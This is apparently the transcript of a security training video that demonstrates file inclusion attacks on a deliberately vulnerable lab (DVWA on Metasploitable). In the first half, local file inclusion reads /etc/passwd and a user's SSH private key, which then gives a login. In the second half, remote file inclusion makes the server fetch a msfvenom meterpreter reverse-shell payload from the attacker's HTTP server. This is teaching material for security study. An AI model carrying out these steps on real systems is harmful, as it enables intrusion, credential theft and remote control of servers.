File Inclusion Demo

Video Transcription
00:01
So here we are on DVWA; here's an Apache server. So I know it's Ubuntu, which means it's Linux, which means if I look for the /etc/passwd file, it will work. If I'm looking for a Windows file, it won't work because this is not a Windows box. Also we're looking at PHP and we're on Apache 2.2.8.
00:19
And I also know the version of PHP here.
00:23
So I can see this page parameter is including this include.php
00:29
file. Now
00:31
with LFI the ../ matters, because if I do this and it says /etc/passwd,
00:38
this might not work. So it really depends how far I go back. So you can just keep doing this manually;
00:44
again, this might take a long time depending on how far back we go and
00:49
how the PHP is written.
00:52
But here we go.
00:53
So now we see the /etc/passwd file. So I'll view source and see how much nicer that is than in the slide.
01:02
So I'm looking for
01:03
the users, I see msfadmin
01:07
and because I know how Linux is structured and I'm looking at the msfadmin user,
01:14
but I'm gonna tack on at the end here,
01:18
sort of, /etc/passwd
01:23
is /home/msfadmin, which is that user 1000,
01:27
/.ssh/id_rsa.
01:30
If they have their permissions configured, I should be able to read it
01:36
and I can see here that it is misconfigured
01:38
and I am able to view it. So now what do you do?
01:42
So again, I view source, I grab this key
01:47
and what I'm gonna do
01:49
is I'm going to make my own key, msfadmin,
01:53
I'm going to paste that private key information in here.
01:57
Going to exit out of this. And you have to chmod this; you can do 400
02:05
or 600.
02:07
And now what I should be able to do is ssh.
02:12
msfadmin. And then give it the user on that box, msfadmin, which I did. So
02:17
now I'm on the box because I used LFI to grab the ssh key.
02:23
That's great.
02:24
So let's exit out of here
02:27
and let me show you what happens with RFI, remote file inclusion. Now
02:30
remember I need to be able to see if it can reach out to my server. So nc -lvp 4444
02:38
and I'll go back and I'm going to change this
02:43
to my server, http://19216812-8:4444.
02:53
And I see here that the connection was received. It's not looking for any file in particular, so I can name my file whatever I want to.
03:00
I'm going to kill the connection here.
03:04
And what I'm gonna do is I'm going to create that shell.txt file
03:08
with msfvenom.
03:12
Now you'll notice the payload, php/meterpreter/reverse_tcp, with my host as well as the LHOST, and my LPORT is 4444.
03:22
And we're gonna make this into this .txt file.
03:24
Like I said, sometimes when you make it a PHP file, it will execute on your own server. And you're like, oh, this looks awfully familiar. Well, that's because it's your own server.
03:34
So the other thing to do is we want to set up Metasploit.
03:40
So you know, I like to execute things directly from the terminal here
03:46
before actually loading Metasploit, the Metasploit framework,
03:52
so I should have everything set up and ready to go.
04:03
So what I'll do now is I need to set up a server on my own machine.
04:10
So I'm gonna use Python 3,
04:12
an HTTP server.
04:15
And
04:17
I'm going to
04:23
change this now.
04:28
to http://
04:30
1921681228
04:33
:8000, because that's where our server's running, on 8000,
04:38
and shell.txt.
04:43
All right. That's on 8000. That's why I chose that. And you can see that meterpreter session is opened.
04:50
And I see there it is. So, if I interact with it, session 1, sysinfo.
04:57
I see I'm on my Metasploitable here.
04:59
So that's how to leverage both: LFI to find valuable information, in this case an ssh key where we can ssh onto this machine,
05:08
or RFI where we can host our own file and have the server reach out and execute our shell, so that now we're on the box here.
05:19
So those are file inclusion vulnerabilities, and that's how to exploit them.